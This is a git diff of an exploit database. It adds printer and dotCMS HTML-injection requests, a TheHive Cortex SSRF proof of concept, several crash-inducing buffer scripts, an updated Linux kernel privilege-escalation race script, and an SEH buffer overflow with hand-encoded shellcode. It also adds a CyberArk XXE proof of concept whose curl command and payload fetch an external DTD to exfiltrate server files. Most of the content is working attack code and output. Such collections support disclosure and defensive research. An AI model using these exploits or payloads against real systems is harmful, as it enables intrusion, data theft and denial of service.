diff --git a/exploits/hardware/webapps/46826.txt b/exploits/hardware/webapps/46826.txt new file mode 100644 index 000000000..2d921c269 --- /dev/null +++ b/exploits/hardware/webapps/46826.txt @@ -0,0 +1,42 @@ +# Exploit Title: RICOH SP 4510DN Printer - HTML Injection +# Date: 2019-05-06 +# Exploit Author: Ismail Tasdelen +# Vendor Homepage: https://www.ricoh.com/ +# Hardware Link: https://www.ricoh-europe.com/products/office-printers-fax/single-function-printers/sp-4520dn.html +# Software: RICOH Printer +# Product Version: SP 4510DN +# Vulernability Type: Code Injection +# Vulenrability: HTML Injection +# CVE: CVE-2019-11845 + +# An HTML Injection vulnerability has been discovered on the RICOH SP 4510DN via the /web/entry/en/address/adrsSetUserWizard.cgi entryNameIn parameter. + +# HTTP POST Request : + +POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0 +Accept: text/plain, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://TARGET/web/entry/en/address/adrsList.cgi +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 102 +DNT: 1 +Connection: close +Cookie: risessionid=071652497206133; cookieOnOffChecker=on; wimsesid=98044857 + +mode=ADDUSER&step=BASE&wimToken=958429369&entryIndexIn=00001&entryNameIn=%22%3E%3Ch1%3ETEST%3C%2Fh1%3E + +# HTTP Response : + +HTTP/1.1 200 OK +Date: Mon, 06 May 2019 11:42:46 GMT +Server: Web-Server/3.0 +Content-Type: text/plain +Expires: Mon, 06 May 2019 11:42:46 GMT +Set-Cookie: cookieOnOffChecker=on; path=/ +Connection: close + +[14] \ No newline at end of file diff --git a/exploits/hardware/webapps/46827.txt b/exploits/hardware/webapps/46827.txt new file mode 100644 index 000000000..6b2972d90 --- /dev/null +++ b/exploits/hardware/webapps/46827.txt @@ -0,0 +1,43 @@ +# Exploit Title: RICOH SP 4520DN Printer - HTML Injection +# Date: 2019-05-06 +# Exploit Author: Ismail Tasdelen +# Vendor Homepage: https://www.ricoh.com/ +# Hardware Link: https://www.ricoh-europe.com/products/office-printers-fax/single-function-printers/sp-4520dn.html +# Software: RICOH Printer +# Product Version: SP 4520DN +# Vulernability Type: Code Injection +# Vulenrability: HTML Injection +# CVE: CVE-2019-11844 + +# An HTML Injection vulnerability has been discovered on the RICOH SP 4520DN via the /web/entry/en/address/adrsSetUserWizard.cgi +# entryNameIn or entryDisplayNameIn parameter. + +# HTTP POST Request : + +POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0 +Accept: text/plain, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://TARGET/web/entry/en/address/adrsList.cgi +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 219 +DNT: 1 +Connection: close +Cookie: risessionid=110508462500758; cookieOnOffChecker=on; wimsesid=598742008 + +mode=ADDUSER&step=BASE&wimToken=279565363&entryIndexIn=00001&entryNameIn=%22%3E%3Ch1%3ETEST%3C%2Fh1%3E&entryDisplayNameIn=%22%3E%3Ch1%3ETEST%3C%2Fh1%3E&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1 + +# HTTP Response : + +HTTP/1.1 200 OK +Date: Mon, 06 May 2019 11:00:09 GMT +Server: Web-Server/3.0 +Content-Type: text/plain +Expires: Mon, 06 May 2019 11:00:09 GMT +Set-Cookie: cookieOnOffChecker=on; path=/ +Connection: close + +[14] \ No newline at end of file diff --git a/exploits/jsp/webapps/46825.txt b/exploits/jsp/webapps/46825.txt new file mode 100644 index 000000000..a41de9e9d --- /dev/null +++ b/exploits/jsp/webapps/46825.txt @@ -0,0 +1,37 @@ +# Exploit Title: dotCMS 5.1.1 - HTML Injection +# Date: 2019-05-09 +# Exploit Author: Ismail Tasdelen +# Vendor Homepage: https://dotcms.com/ +# Software Link: https://github.com/dotCMS +# Software: dotCMS +# Product Version: 5.1.1 +# Vulernability Type: Code Injection +# Vulenrability: HTML Injection and Cross-site Scripting +# CVE: CVE-2019-11846 + +# HTTP POST Request : + +POST /servlets/ajax_file_upload?fieldName=binary3 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://TARGET/c/portal/layout?p_l_id=b7ab5d3c-5ee0-4195-a17e-8f5579d718dd&p_p_id=site-browser&p_p_action=1&p_p_state=maximized&angularCurrentPortlet=site-browser&p_p_mode=view&_site_browser_struts_action=%2Fext%2Fcontentlet%2Fedit_contentlet&_site_browser_cmd=new&selectedStructure=33888b6f-7a8e-4069-b1b6-5c1aa9d0a48d&folder=SYSTEM_FOLDER&referer=/c/portal/layout%3Fp_l_id%3Db7ab5d3c-5ee0-4195-a17e-8f5579d718dd%26p_p_id%3Dsite-browser%26p_p_action%3D0%26p_p_state%3Dmaximized%26angularCurrentPortlet%3Dsite-browser%26p_p_mode%3Dview%26_site_browser_struts_action%3D%252Fext%252Fbrowser%252Fview_browser&in_frame=true&frame=detailFrame&container=true&angularCurrentPortlet=site-browser +Content-Type: multipart/form-data; boundary=---------------------------5890268631313811380287956669 +Content-Length: 101313 +DNT: 1 +Connection: close +Cookie: messagesUtk=2366e7c3b5af4c8c93bb11d0c994848a; BACKENDID=172.18.0.3; JSESSIONID=65C16EFBEE5B7176B22083A0CA451F0A.c16f6b7d05d9; hs-messages-hide-welcome-message=true; access_token=eyJhbGciOiJIUzI1NiJ9.eyJqdGkiOiJkZGFlZmEzNS0yYmMyLTQ4MTEtOTRjNi0xNGE0OTk4YzFkNDAiLCJpYXQiOjE1NTczOTY0NzYsInVwZGF0ZWRfYXQiOjEyMDQ4MjQ5NjEwMDAsInN1YiI6ImRvdGNtcy5vcmcuMSIsImlzcyI6IjRiNTkyYjIyLTBiMmEtNGI2ZC05NmU4LTdjMzBiMzgzOTM1ZiJ9.F8_L_Cu96pkYcwTl4ex_zfrA-Fk-rqNUz24oCV0gOmc; DWRSESSIONID=EZToDkzmi*mMXCayMxskFA75sGm +Upgrade-Insecure-Requests: 1 + +-----------------------------5890268631313811380287956669 +Content-Disposition: form-data; name="binary3FileUpload"; filename="\"> .json" +Content-Type: application/json + +# HTTP Response : + +HTTP/1.1 200 +Content-Length: 0 +Date: Thu, 09 May 2019 10:23:44 GMT +Connection: close \ No newline at end of file diff --git a/exploits/linux/local/9844.py b/exploits/linux/local/9844.py index 26efab184..0198ba29b 100755 --- a/exploits/linux/local/9844.py +++ b/exploits/linux/local/9844.py @@ -1,13 +1,14 @@ -# This is a PoC based off the PoC release by Earl Chew +# This is a PoC based off the PoC release by Earl Chew (Updated by Brian Peters) # Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability # PoC by Matthew Bergin # Bugtraq ID: 36901 # -# E-DB Note: Exploit Update ~ https://github.com/offensive-security/exploitdb/pull/82/files +# E-DB Note: Exploit Update v2 ~ https://github.com/offensive-security/exploitdb/pull/82/files import os import time import random +import subprocess #infinite loop i = 0 x = 0 @@ -15,7 +16,9 @@ while (i == 0): os.system("sleep 1") while (x == 0): time.sleep(random.random()) #random int 0.0-1.0 - pid = str(os.system("ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID; }")) + p = subprocess.Popen(["ps -elf | grep 'sleep 1' | grep -v 'grep' | awk '{print $4}'"], stdout=subprocess.PIPE, shell=True) + result = p.stdout.read() + pid = result.replace('\n', '').replace('\r', '') if (pid == "0"): #need an active pid, race condition applies print "[+] Didnt grab PID, got: " + pid + " -- Retrying..." break diff --git a/exploits/multiple/webapps/46820.txt b/exploits/multiple/webapps/46820.txt new file mode 100644 index 000000000..23e6c50cd --- /dev/null +++ b/exploits/multiple/webapps/46820.txt @@ -0,0 +1,31 @@ +# Exploit Title: SSRF in TheHive Project Cortex <= 2.1.3 +# Date: 2/26/2019 +# Exploit Author: Alexandre Basquin +# Vendor Homepage: https://blog.thehive-project.org +# Software Link: https://github.com/TheHive-Project/Cortex +# Version: Cortex <= 2.1.3 +# Tested on: 2.1.3 +# CVE : CVE-2019-7652 + +# Exploit description + +TheHive Project Cortex version <= 2.1.3 is vulnerable to a SSRF vulnerability in the "UnshortenLink_1_0" analyzer. + +References: + +https://blog.thehive-project.org/2019/02/11/unshortenlink-ssrf-and-cortex-analyzers-1-15-2/ + + + +POC: + +1. Create a new analysis + +2. Select Data Type "URL" + +3. Put your SSRF payload in the Data parameter (e.g. "http://127.0.0.1:22") + +4. Result can be seen in the main dashboard. + + +Reported to TheHive Project by Alexandre Basquin on 1/24/2019 \ No newline at end of file diff --git a/exploits/multiple/webapps/46828.txt b/exploits/multiple/webapps/46828.txt new file mode 100644 index 000000000..a2d5193b8 --- /dev/null +++ b/exploits/multiple/webapps/46828.txt @@ -0,0 +1,97 @@ +# Exploit Title: CyberArk XML External Entity (XXE) Injection in SAML +authentication +# Date: 10/05/2019 +# Exploit Author: Marcelo Toran (@spamv) +# Vendor Homepage: https://www.cyberark.com +# Version: <=10.7 +# CVE : CVE-2019-7442 + + +-----------Product description +The CyberArk Enterprise Password Vault is a privileged access security +solution to store, monitor and rotate credentials. The main objective +of the solution is protecting the privileged accounts that are used to +administrate the systems of the organisations. + +-----------Vulnerability description +This vulnerability allows remote attackers to disclose sensitive +information or potentially bypass the authentication system. + +-----------Vulnerability Details +# Exploit Title: XML External Entity (XXE) Injection in SAML authentication +# Affected Component: Password Vault Web Access (PVWA) +# Affected Version: <=10.7 +# Vendor: CyberArk +# Vendor Homepage: https://www.cyberark.com +# Date: 18/12/2018 +# CVSS Base Score: 7.5 (High) +# CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N +# Exploit Author: Marcelo Torán (Nixu Corporation) +# CVE: CVE-2019-7442 +# CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7442 + +-----------Technical Description +It has been found that the XML parser of the SAML authentication +system of the Password Vault Web Access (PVWA) is vulnerable to XML +External Entity (XXE) attacks via a crafted DTD. No user interaction +or privileges are required as the vulnerability is triggered in +pre-authentication. +The vulnerable component is: https://example.com/PasswordVault/auth/saml +The vulnerable argument: SAMLResponse + +-----------POC + +# pepe.dtd is an external entity stored in a remote web server where we define the file that will be read and the server that will be used for the exfiltration: + +"> + + +# The malicious XML payload where is defined the address of the external entity defined in the previous step: + + +%sp; + +%param1; + +]> +&exfil; + + +# XML payload base64 encoded + equal symbols URL encoded: +PCFET0NUWVBFIHIgWwo8IUVMRU1FTlQgciBBTlkgPgo8IUVOVElUWSAlIHNwIFNZU1RFTSAiaHR0cDovL2V4dGVybmFsc2VydmVyLmNvbS9wZXBlLmR0ZCI+CiVzcDsKJXBhcmFtMTsKXT4KPHI+JmV4ZmlsOzwvcj4%3d + + +# CURL command to exploit the XXE: +curl -i -s -k -X $'POST' \ + -H $'Host: example.com' -H $'User-Agent: PoC CyberArk XXE Injection :(' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 177' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ + --data-binary $'SAMLResponse=PCFET0NUWVBFIHIgWwo8IUVMRU1FTlQgciBBTlkgPgo8IUVOVElUWSAlIHNwIFNZU1RFTSAiaHR0cDovL2V4dGVybmFsc2VydmVyLmNvbS9wZXBlLmR0ZCI+CiVzcDsKJXBhcmFtMTsKXT4KPHI+JmV4ZmlsOzwvcj4%3d' \ + $'https://example.com/PasswordVault/auth/saml/' + + +# Checking the logs of the external server: +example.com - - [XX/XX/XX XX:XX:XX] "GET /pepe.dtd HTTP/1.1" 200 - +example.com - - [XX/XX/XX XX:XX:XX] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5Bfiles%5D%0D%0A%5BMail%5D%0D%0AMAPI=1 HTTP/1.1" 200 - + + +# And decoding the content of the logs it's possible to read the requested file of the machine: +; for 16-bit app support +[fonts] +[extensions] +[mci extensions] +[files] +[Mail] +MAPI=1 + +-----------Timeline +18/12/2018 – Vulnerability discovered +10/01/2019 – Vendor notified +23/01/2019 – Vulnerability accepted +05/02/2019 – CVE number requested +05/02/2019 – CVE number assigned +19/02/2019 – Vendor released a patch +19/02/2019 – Advisory released + +-----------Proof of Concept (PoC) + +https://www.octority.com/2019/05/07/cyberark-enterprise-password-vault-xml-external-entity-xxe-injection/ \ No newline at end of file diff --git a/exploits/windows/dos/46819.py b/exploits/windows/dos/46819.py new file mode 100755 index 000000000..e6d1f8ca8 --- /dev/null +++ b/exploits/windows/dos/46819.py @@ -0,0 +1,22 @@ +#Exploit Title: jetCast Server 2.0 - Denial of Service (PoC) +#Discovery by: Victor Mondragón +#Discovery Date: 2019-05-09 +#Vendor Homepage: http://www.jetaudio.com/ +#Software Link: http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/Download/jetCast/build/JCS2000.exe +#Tested Version: 2.0 +#Tested on: Windows 7 Service Pack 1 x64 + +#Steps to produce the crash: +#1.- Run python code: jetCast_Server_2.0.py +#2.- Open jetCast.txt and copy content to clipboard +#2.- Open jetCast Server +#3.- Select Config +#4.- In "Log directory" Paste ClipBoard +#5.- Click on "Ok" +#6.- Click on "Start" +#7.- Crashed + +cod = "\x41" * 5000 +f = open('jetCast.txt', 'w') +f.write(cod) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/46821.py b/exploits/windows/dos/46821.py new file mode 100755 index 000000000..971815381 --- /dev/null +++ b/exploits/windows/dos/46821.py @@ -0,0 +1,22 @@ +# -*- coding: utf-8 -*- +# Exploit Title: SpotIM 2.2 - 'Name/Key' Denial of Service (PoC) +# Date: 09/05/2019 +# Author: Alejandra Sánchez +# Vendor Homepage: http://www.nsauditor.com +# Software Link http://www.nsauditor.com/downloads/spotim_setup.exe +# Version: 2.2 +# Tested on: Windows 10 + +# Proof of Concept: +# 1.- Run the python script "SpotIM.py", it will create a new file "SpotIM.txt" +# 2.- Copy the text from the generated SpotIM.txt file to clipboard +# 3.- Open SpotIM +# 4. Select "Register" > "Enter Registration Code..." +# 5.- Paste clipboard in the Name/Key field +# 6.- Click 'OK' +# 7.- Crashed + +buffer = "\x41" * 1000 +f = open ("SpotIM.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/46822.py b/exploits/windows/dos/46822.py new file mode 100755 index 000000000..aa6d9497b --- /dev/null +++ b/exploits/windows/dos/46822.py @@ -0,0 +1,22 @@ +# -*- coding: utf-8 -*- +# Exploit Title: SpotPaltalk 1.1.5 - 'Name/Key' Denial of Service (PoC) +# Date: 09/05/2019 +# Author: Alejandra Sánchez +# Vendor Homepage: http://www.nsauditor.com +# Software Link http://www.nsauditor.com/downloads/spotpaltalk_setup.exe +# Version: 1.1.5 +# Tested on: Windows 10 + +# Proof of Concept: +# 1.- Run the python script "SpotPaltalk.py", it will create a new file "SpotPaltalk.txt" +# 2.- Copy the text from the generated SpotPaltalk.txt file to clipboard +# 3.- Open SpotPalTalk +# 4. Select "Register" > "Enter Registration Code..." +# 5.- Paste clipboard in the Name/Key field +# 6.- Click 'OK' +# 7.- Crashed + +buffer = "\x41" * 1000 +f = open ("SpotPaltalk.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/46823.py b/exploits/windows/dos/46823.py new file mode 100755 index 000000000..4a8a2c031 --- /dev/null +++ b/exploits/windows/dos/46823.py @@ -0,0 +1,22 @@ +#Exploit Title: ASPRunner.NET 10.1 - Denial of Service (PoC) +#Discovery by: Victor Mondragón +#Discovery Date: 2019-05-09 +#Vendor Homepage: https://xlinesoft.com/ +#Software Link: https://xlinesoft.com/asprunnernet/download.htm +#Tested Version: 10.1 +#Tested on: Windows 7 Service Pack 1 x64 + +#Steps to produce the crash: +#1.- Run python code: ASPRunner_net_10_1.py +#2.- Open ASPRunner_10_1.txt and copy content to clipboard +#3.- Open ASPRunner.NET +#4.- Click on "Next" > Select "SQLite" database > click on "Next" +#5.- Click on "Create new database" +#6.- In "Table name" field Paste Clipboarad +#7.- Click on "Create table" +#8.- Crashed + +cod = "\x41" * 10000 +f = open('ASPRunner_10_1.txt', 'w') +f.write(cod) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/46824.py b/exploits/windows/dos/46824.py new file mode 100755 index 000000000..7765c8716 --- /dev/null +++ b/exploits/windows/dos/46824.py @@ -0,0 +1,22 @@ +#Exploit Title: PHPRunner 10.1 - Denial of Service (PoC) +#Discovery by: Victor Mondragón +#Discovery Date: 2019-05-09 +#Vendor Homepage: https://xlinesoft.com/ +#Software Link: https://xlinesoft.com/phprunner/download.htm +#Tested Version: 10.1 +#Tested on: Windows 7 Service Pack 1 x64 + +#Steps to produce the crash: +#1.- Run python code: PHPRunner_10_1.py +#2.- Open PHPRunner_10_1.txt and copy content to clipboard +#3.- Open PHPRunner +#4.- Click on "Next" > Select "Microsoft Access" database > click on "Next" +#5.- Click on "Create new database" > click on "Create table" +#6.- Select "Create dashboard" > in "Name" field Paste Clipboarad +#7.- Click on "Ok" +#8.- Crashed + +cod = "\x41" * 10000 +f = open('PHPRunner_10_1.txt', 'w') +f.write(cod) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/46805.py b/exploits/windows/local/46805.py index f66960153..bbe36fa26 100755 --- a/exploits/windows/local/46805.py +++ b/exploits/windows/local/46805.py @@ -1,4 +1,4 @@ -# Title: Admin Express v1.2.5.485 Folder Path Local SEH Alphanumeric Encoded Buffer Overflow +# Title: Admin Express v1.2.5.485 'Folder Path' Local SEH Alphanumeric Encoded Buffer Overflow # Date: May 6th, 2019 # Author: Connor McGarr (https://connormcgarr.github.io) # Vendor Homepage: https://admin-express.en.softonic.com/ @@ -9,14 +9,19 @@ # TO RUN: # 1. Run python script # 2. Copy contents of pwn.txt -# 3. Open AdminExpress +# 3. Open Admin Express # 4. Select System Compare -# 5. Paste contents into Folder Path on the left hand side -# 6. Press the scale icon in the middle of the screen, under the Services and Running Processes tabs +# 5. Paste contents into the left-hand side Folder Path field +# 6. Click the scale icon in the middle of the screen, under the Services and Running Processes tabs -# This got a bit hairy. We manually encoded our shellcode, and we had to use the sub method for each encode. -# 05 was a bad char for us, which was an add eax opcode. We could use (in hex) 1-4,6,10-7E. This was an odd character set. +# This got a bit hairy. We manually encoded our shellcode and had to use the sub method for encoding each line of payload. +# 05 was a bad character for us, which is an add eax opcode. We could use (in hex) 1-4,6,10-7E. This was an odd character set. + +# Can replace with a shell, if you are willing to do the encoding and decoding math Too preoccupied for now, so here is calc.exe +# You would need to use logical AND plus the sub eax opcodes to get a value on the stack that could jump back to the A buffer, where there is +# much more room. Then you would need to align the stack with the stack pointer value you need (not 0x012F3F4 as used below) and write to the stack upwards. +# You should have enough room for all of the logical AND plus sub eax commands to get a full-sized shell payload on the stack. # calc.exe shellcode: # "\x31\xc9\x51\x68" @@ -24,87 +29,85 @@ # "\x54\xB8\xc7\x93" # "\xc2\x77\xff\xd0" -# Can replace with a shell, if you are willing to do the encoding and decoding math :-) Too preoccupied for now, so here is a calc.exe -# You would need to use logicla AND and the SUB EAX opcodes to get a value on the stack that could jump back to the A buffer, where there is -# much more room. Then you would need to align the stack with the value you need (not 0x012F3F4 as used below), and write upwards on the stack. -# You should have enough room for all of the logical AND and SUB EAX commands to get a full shell on the stack. - # For zeroing out registers before manual shellcode zero = "\x25\x01\x01\x01\x01" # and eax, 0x01010101 zero += "\x25\x10\x10\x10\x10" # and eax, 0x10101010 -# For restoring stack pointer before execution of shellcode, due to -# old stack pointer value needed. This puts 0x0012DC98 into ECX, to be used later -restore = "\x54" # push esp; (pushing the current value of ESP, which needs to be restored later, onto the stack) -restore += "\x59" # pop ecx; (holding the value of old ESP in ECX, to be called later.) -restore += "\x51" # push ecx; (to get the value on the stack for the mov esp command later) +# We need to save the current stack pointer before execution of shellcode, due to +# old stack pointer value needed when executing our payload of calc.exe. This puts the current stack pointer 0x0012DC98 into ECX, to be used later +restore = "\x54" # push esp; (pushing the current value of ESP, which needs to be restored later, onto the stack) +restore += "\x59" # pop ecx; (holding the value of old ESP in ECX, to be called later.) +restore += "\x51" # push ecx; (to get the value on the stack for the mov esp command later) # Stack alignment # Need to make ESP 0x012F3F4. Using sub method to write that value onto the stack. # After making ESP 0x012F3F4, it should be the same value as EAX- so we can write up the stack. -alignment = "\x54" # push esp -alignment += "\x58" # pop eax; (puts the value of ESP into EAX) +alignment = "\x54" # push esp +alignment += "\x58" # pop eax; (puts the value of ESP into EAX) -# Write these 3 sub values in normal format, since memory address, not instruction to be executed. +# Write these 3 sub values in normal format, since memory address, not instruction to be executed. You do not have to do +# it this way, but I do my calculations in normal format to remind me it is a memory address, when doing hex max. For my +# other operations, I used little endian. If you do all of the calculations in one way, you do not need to flip the sub +# math difference results. This is how I keep things straight # 384D5555 364D5555 364E5555 -alignment += "\x2d\x38\x4d\x55\x55" # sub eax, 0x384D5555 -alignment += "\x2d\x36\x4d\x55\x55" # sub eax, 0x364D5555 -alignment += "\x2d\x36\x4e\x55\x55" # sub eax, 0x364E5555 -alignment += "\x50" # push eax -alignment += "\x5c" # pop esp; (puts the value of eax back into esp) +alignment += "\x2d\x38\x4d\x55\x55" # sub eax, 0x384D5555 +alignment += "\x2d\x36\x4d\x55\x55" # sub eax, 0x364D5555 +alignment += "\x2d\x36\x4e\x55\x55" # sub eax, 0x364E5555 +alignment += "\x50" # push eax +alignment += "\x5c" # pop esp; (puts the value of eax back into esp) # calc.exe shellcode, via the sub method. Values needed are as followed. Reference the calc.exe shellcode line for line numbers. # 1st line = 2C552D14 01552D14 01562E16 shellcode = zero -shellcode += "\x2d\x14\x2d\x55\x2c" # sub eax, 0x2C552D14 -shellcode += "\x2d\x14\x2d\x55\x01" # sub eax, 0x01562D14 -shellcode += "\x2d\x16\x2e\x56\x01" # sub eax, 0x01562E16 -shellcode += "\x50" # push eax; (get the value on the stack). We will do this for all remaining steps like this one. +shellcode += "\x2d\x14\x2d\x55\x2c" # sub eax, 0x2C552D14 +shellcode += "\x2d\x14\x2d\x55\x01" # sub eax, 0x01562D14 +shellcode += "\x2d\x16\x2e\x56\x01" # sub eax, 0x01562E16 +shellcode += "\x50" # push eax; (get the value on the stack). We will do this for all remaining steps like this one. # 2nd line = 24121729 24121739 2414194A shellcode += zero -shellcode += "\x2d\x29\x17\x12\x24" # sub eax, 0x24121729 +shellcode += "\x2d\x29\x17\x12\x24" # sub eax, 0x24121729 shellcode += "\x2d\x39\x17\x12\x24" # sub eax, 0x24121739 shellcode += "\x2d\x4a\x19\x14\x24" # sub eax, 0x2414194A (was 40 at the end, but a miscalc happened. Changed to 4A) -shellcode += "\x50" # push eax +shellcode += "\x50" # push eax # 3rd line = 34313635 34313434 34313434 shellcode += zero -shellcode += "\x2d\x35\x36\x31\x34" # sub eax, 0x34313635 -shellcode += "\x2d\x34\x34\x31\x34" # sub eax, 0x34313434 -shellcode += "\x2d\x34\x34\x31\x34" # sub eax, 0x34313434 -shellcode += "\x50" # push eax +shellcode += "\x2d\x35\x36\x31\x34" # sub eax, 0x34313635 +shellcode += "\x2d\x34\x34\x31\x34" # sub eax, 0x34313434 +shellcode += "\x2d\x34\x34\x31\x34" # sub eax, 0x34313434 +shellcode += "\x50" # push eax # 4th line = 323A1245 323A1245 333A1245 shellcode += zero -shellcode += "\x2d\x45\x12\x3a\x32" # sub eax, 0x323A1245 -shellcode += "\x2d\x45\x12\x3a\x32" # sub eax, 0x323A1245 -shellcode += "\x2d\x45\x12\x3a\x33" # sub eax, 0x333A1245 -shellcode += "\x50" # push eax +shellcode += "\x2d\x45\x12\x3a\x32" # sub eax, 0x323A1245 +shellcode += "\x2d\x45\x12\x3a\x32" # sub eax, 0x323A1245 +shellcode += "\x2d\x45\x12\x3a\x33" # sub eax, 0x333A1245 +shellcode += "\x50" # push eax # We need to restore the old ESP value of 0x0012DC98 to spawn calc.exe. Since it is a syscall, -# We need the ESP value before execution. We will do this by performing MOV ECX, ESP (remember ECX contains old ESP!) +# we need the ESP value before execution. We will do this by performing MOV ECX, ESP (remember ECX contains old ESP!). # Here are the 3 values: 403F2711 3F3F2711 3F3F2811 move = zero -move += "\x2d\x40\x3f\x27\x11" # sub eax, 0x3F3F2711 -move += "\x2d\x3f\x3f\x27\x11" # sub eax, 0x3F3F2711 -move += "\x2d\x3f\x3f\x28\x11" # sub eax, 0x3F3F2811 -move += "\x50" # push eax +move += "\x2d\x40\x3f\x27\x11" # sub eax, 0x403F2711 +move += "\x2d\x3f\x3f\x27\x11" # sub eax, 0x3F3F2711 +move += "\x2d\x3f\x3f\x28\x11" # sub eax, 0x3F3F2811 +move += "\x50" # push eax # All together now. payload = "\x41" * 4260 -payload += "\x70\x7e\x71\x7e" # JO 126 hex bytes. If jump fails, default to JNO 126 hex bytes -payload += "\x42\x4c\x01\x10" # 0x10014c42 pop pop ret wmiwrap.DLL +payload += "\x70\x7e\x71\x7e" # JO 126 bytes. If jump fails, default to JNO 126 bytes +payload += "\x42\x4c\x01\x10" # 0x10014c42 pop pop ret wmiwrap.DLL # There are 2 NULL (\x00) terminators in our buffer of A's, near our nSEH jump. We are going to jump far away from them # so we have enough room for our shellcode and to decode. -payload += "\x41" * 122 # add padding since we jumped 7e (126 bytes) above -payload += "\x70\x7e\x71\x7e" # JO or JNO another 126 bytes, so shellcode can decode +payload += "\x41" * 122 # add padding since we jumped 7e hex bytes (126 bytes) above +payload += "\x70\x7e\x71\x7e" # JO or JNO another 126 bytes, so shellcode can decode payload += "\x41" * 124 -payload += "\x70\x7e\x71\x7e" # JO or JNO another 126 bytes, so shellcode can decode +payload += "\x70\x7e\x71\x7e" # JO or JNO another 126 bytes, so shellcode can decode payload += "\x41" * 124 -payload += "\x70\x79\x71\x79" # JO or JNO only 121 bytes -payload += "\x41" * 121 # NOP is in the restricted chars. Using \x41 as a slide into alignment +payload += "\x70\x79\x71\x79" # JO or JNO only 121 bytes +payload += "\x41" * 121 # NOP is in the restricted characters. Using \x41 as a slide into alignment payload += restore payload += alignment payload += shellcode diff --git a/files_exploits.csv b/files_exploits.csv index 5ef1b02b1..7e9706243 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6413,7 +6413,12 @@ id,file,description,date,author,type,platform,port 46810,exploits/windows/dos/46810.py,"jetAudio 8.1.7.20702 Basic - 'Enter URL' Denial of Service (PoC)",2019-05-08,"Victor Mondragón",dos,windows, 46816,exploits/windows/dos/46816.py,"Lyric Video Creator 2.1 - '.mp3' Denial of Service (PoC)",2019-05-09,"Alejandra Sánchez",dos,windows, 46817,exploits/windows/dos/46817.py,"Lyric Maker 2.0.1.0 - Denial of Service (PoC)",2019-05-09,"Alejandra Sánchez",dos,windows, +46819,exploits/windows/dos/46819.py,"jetCast Server 2.0 - Denial of Service (PoC)",2019-05-10,"Victor Mondragón",dos,windows, 46818,exploits/windows/dos/46818.py,"Convert Video jetAudio 8.1.7 - Denial of Service (PoC)",2019-05-09,"Alejandra Sánchez",dos,windows, +46821,exploits/windows/dos/46821.py,"SpotIM 2.2 - Denial of Service (PoC)",2019-05-10,"Alejandra Sánchez",dos,windows, +46822,exploits/windows/dos/46822.py,"SpotPaltalk 1.1.5 - Denial of Service (PoC)",2019-05-10,"Alejandra Sánchez",dos,windows, +46823,exploits/windows/dos/46823.py,"ASPRunner.NET 10.1 - Denial of Service (PoC)",2019-05-10,"Victor Mondragón",dos,windows, +46824,exploits/windows/dos/46824.py,"PHPRunner 10.1 - Denial of Service (PoC)",2019-05-10,"Victor Mondragón",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -41245,3 +41250,8 @@ id,file,description,date,author,type,platform,port 46804,exploits/multiple/webapps/46804.txt,"Prinect Archive System 2015 Release 2.6 - Cross-Site Scripting",2019-05-07,alt3kx,webapps,multiple,80 46811,exploits/linux/webapps/46811.txt,"NetNumber Titan ENUM/DNS/NP 7.9.1 - Path Traversal / Authorization Bypass",2019-05-08,MobileNetworkSecurity,webapps,linux, 46815,exploits/php/webapps/46815.txt,"Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Cross-Site Scripting",2019-05-09,"Ibrahim Raafat",webapps,php, +46820,exploits/multiple/webapps/46820.txt,"TheHive Project Cortex < 1.15.2 - Server-Side Request Forgery",2019-05-10,"Alexandre Basquin",webapps,multiple, +46825,exploits/jsp/webapps/46825.txt,"dotCMS 5.1.1 - HTML Injection",2019-05-10,"Ismail Tasdelen",webapps,jsp, +46826,exploits/hardware/webapps/46826.txt,"RICOH SP 4510DN Printer - HTML Injection",2019-05-10,"Ismail Tasdelen",webapps,hardware, 